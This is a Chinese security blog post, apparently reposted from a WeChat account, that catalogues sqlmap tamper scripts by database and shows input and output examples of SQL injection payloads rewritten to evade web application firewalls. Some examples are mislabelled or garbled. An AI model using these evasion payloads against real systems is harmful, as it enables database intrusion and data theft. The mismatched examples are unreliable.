Tamper脚本详细使用技巧

  • A+
所属分类:安全工具


sqlmap -r 1.txt --tamper=???


时常使用Tamper脚本却不清楚用哪个好?这篇文章,一一细说。


Tamper脚本详细使用技巧


每个数据库都有不一样的特性,把tamper分为八大类


------------


1. All

2. Mssql

3. Mysql

4. MySQL < 5.1

5. MySQL >= 5.1.13

6. Oracle

7. PostgreSQL

8. Access


------------


**1. All**


apostrophemask.py

```html

utf8代替引号:

("1 AND '1'='1") '1 AND%EF%BC%871%EF%BC%87=%EF%BC%871'

```

base64encode.py

```html

base64编码替换:

("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw=='

```

multiplespaces.py

```html

围绕SQL关键字添加多个空格:

('1 UNION SELECT foobar')'1    UNION     SELECT   foobar'

```

space2plus.py

```html

用+替换空格:

('SELECT id FROM users')'SELECT+id+FROM+users'

```

nonrecursivereplacement.py

```html

双重查询语句。取代predefined SQL关键字with表示 suitable for替代(例如  .replace(“SELECT”、”")) filters:('1 UNION SELECT 2--')'1 UNIOUNIONN SELESELECTCT 2--'

```

space2randomblank.py

```html

代替空格字符(“”)从一个随机的空白字符可选字符的有效集:

('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'

```

unionalltounion.py

```html

替换UNION ALL SELECT UNION SELECT:

('-1 UNION ALL SELECT')'-1 UNION SELECT'

```

securesphere.py

```html

追加特制的字符串:

('1 AND 1=1')"1 AND 1=1 and '0having'='0having'"

```

chardoubleencode.py

```html

双url编码(不处理以编码的):

* Input: SELECT FIELD FROM%20TABLE

* Output: %2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545

```

unmagicquotes.py

```html

宽字符绕过 GPC addslashes:

* Input: 1′ AND 1=1

* Output: 1%bf%27 AND 1=1–%20

```

randomcomments.py

```html

用/**/分割sql关键字:

‘INSERT’ becomes ‘IN//S//ERT’

```



------------



**2. Mssql**


space2hash.py

```html

绕过过滤‘=’ 替换空格字符(”),(’ – ‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’):

'1 AND 9227=9227' '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' 

```

equaltolike.py

```html

like代替等号:

* Input: SELECT * FROM users WHERE id=1 2

* Output: SELECT * FROM users WHERE id LIKE 1

```

space2mssqlblank.py(mssql)

```html

空格替换为其它空符号Input: 

SELECT id FROM users Output: SELECT%08id%02FROM%0Fusers

```

space2mssqlhash.py

```html

替换空格:

('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227'

```

between.py

```html

用between替换大于号(>):

('1 AND A > B--')'1 AND A NOT BETWEEN 0 AND B--'

```

percentage.py

```html

asp允许每个字符前面添加一个%号:

* Input: SELECT FIELD FROM TABLE 

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

```

sp_password.py

```html

追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾:

('1 AND 9227=9227-- ')'1 AND 9227=9227-- sp_password'

```

charencode.py

```html

url编码:

* Input: INSERT 

* Output: InsERt

```

charunicodeencode.py

```html

字符串 unicode 编码:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

```

randomcase.py

```html

随机大小写:

* Input: INSERT 

* Output: InsERt

```

space2comment.py

```html

Replaces space character (‘ ‘) with comments ‘/**/’:

* Input: SELECT id FROM users 

* Output: SELECT//id//FROM/**/users

```



------------



**3. Mysql**


equaltolike.py

```html

like 代替等号:

* Input: SELECT * FROM users WHERE id=1

* Output: SELECT * FROM users WHERE id LIKE 1

```

greatest.py

```html

绕过过滤’>’ ,用GREATEST替换大于号:

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

```

apostrophenullencode.py

```html

绕过过滤双引号,替换字符和双引号:

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

```

ifnull2ifisnull.py

```html

绕过对 IFNULL 过滤,替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’

('IFNULL(1, 2)')

'IF(ISNULL(1),2,1)'

```

space2mssqlhash.py

```html

替换空格:

('1 AND 9227=9227')

'1%23%0AAND%23%0A9227=9227'

```

modsecurityversioned.py

```html

过滤空格,包含完整的查询版本注释:

('1 AND 2>1--')

'1 /*!30874AND 2>1*/--'

```

space2mysqlblank.py

```html

空格替换其它空白符号(mysql):

Input: SELECT id FROM users

Output: SELECT%0Bid%0BFROM%A0users

```

between.py

```html

用between替换大于号(>):

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

```

modsecurityzeroversioned.py

```html

包含了完整的查询与零版本注释:

('1 AND 2>1--')

'1 /*!00000AND 2>1*/--'

```

space2mysqldash.py

```html

替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’):

('1 AND 9227=9227')

'1--%0AAND--%0A9227=9227'

```

bluecoat.py

```html

代替空格字符后与一个有效的随机空白字符的SQL语句,然后替换=为like:

('SELECT id FROM users where id = 1')

'SELECT%09id FROM users where id LIKE 1'

```

percentage.py

```html

asp允许每个字符前面添加一个%号:

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

```

charencode.py

```html

url编码:

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

```

randomcase.py

```html

随机大小写:

* Input: INSERT

* Output: InsERt

```

versionedkeywords.py

```html

Encloses each non-function keyword with versioned MySQL comment:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#

* Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#

```

charunicodeencode.py

```html

字符串 unicode 编码:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

```

versionedmorekeywords.py

```html

注释绕过:

* Input: 1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#

*Output: 1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

```



------------



**4. Mysql < 5.1**


halfversionedmorekeywords.py

```html

关键字前加注释:

* Input: value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa

* Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa

```

halfversionedmorekeywords.py

```html

当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论:

1.("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")

2."value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"

```



------------



**5. Mysql >= 5.1**


space2morehash.py

```html

空格替换为 #号 以及更多随机字符串换行符

* Input: 1 AND 9227=9227

* Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227

```



------------



**6. Oracle**


greatest.py

```html

绕过过滤’>’ ,用GREATEST替换大于号:

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

```

apostrophenullencode.py

```html

绕过过滤双引号,替换字符和双引号:

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

```

between.py

```html

用between替换大于号(>):

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

```

charencode.py

```html

url编码:

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

```

randomcase.py

```html

随机大小写:

* Input: INSERT

* Output: InsERt

```

charunicodeencode.py

```html

字符串 unicode 编码:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

```

space2comment.py

```html

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

```



------------



**7. PostgreSQL**


greatest.py

```html

绕过过滤’>’ ,用GREATEST替换大于号:

('1 AND A > B')

'1 AND GREATEST(A,B+1)=A'

```

apostrophenullencode.py

```html

绕过过滤双引号,替换字符和双引号:

tamper("1 AND '1'='1")

'1 AND %00%271%00%27=%00%271'

```

between.py

```html

用between替换大于号(>):

('1 AND A > B--')

'1 AND A NOT BETWEEN 0 AND B--'

```

percentage.py

```html

asp允许每个字符前面添加一个%号:

* Input: SELECT FIELD FROM TABLE

* Output: %S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

```

charencode.py

```html

url编码:

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

```

randomcase.py

```html

url编码:

* Input: SELECT FIELD FROM%20TABLE

* Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45

```

charunicodeencode.py

```html

字符串 unicode 编码:

* Input: SELECT FIELD%20FROM TABLE

* Output: %u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

```

space2comment.py

```html

Replaces space character (‘ ‘) with comments ‘/**/’

* Input: SELECT id FROM users

* Output: SELECT//id//FROM/**/users

```



------------



**8. Microsoft Access**


appendnullbyte.py

```html

在有效负荷结束位置加载零字节字符编码:

('1 AND 1=1')

'1 AND 1=1%00'

```



------------


需要完整tamper请在后台回复

本文始发于微信公众号(Khan安全团队):Tamper脚本详细使用技巧

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: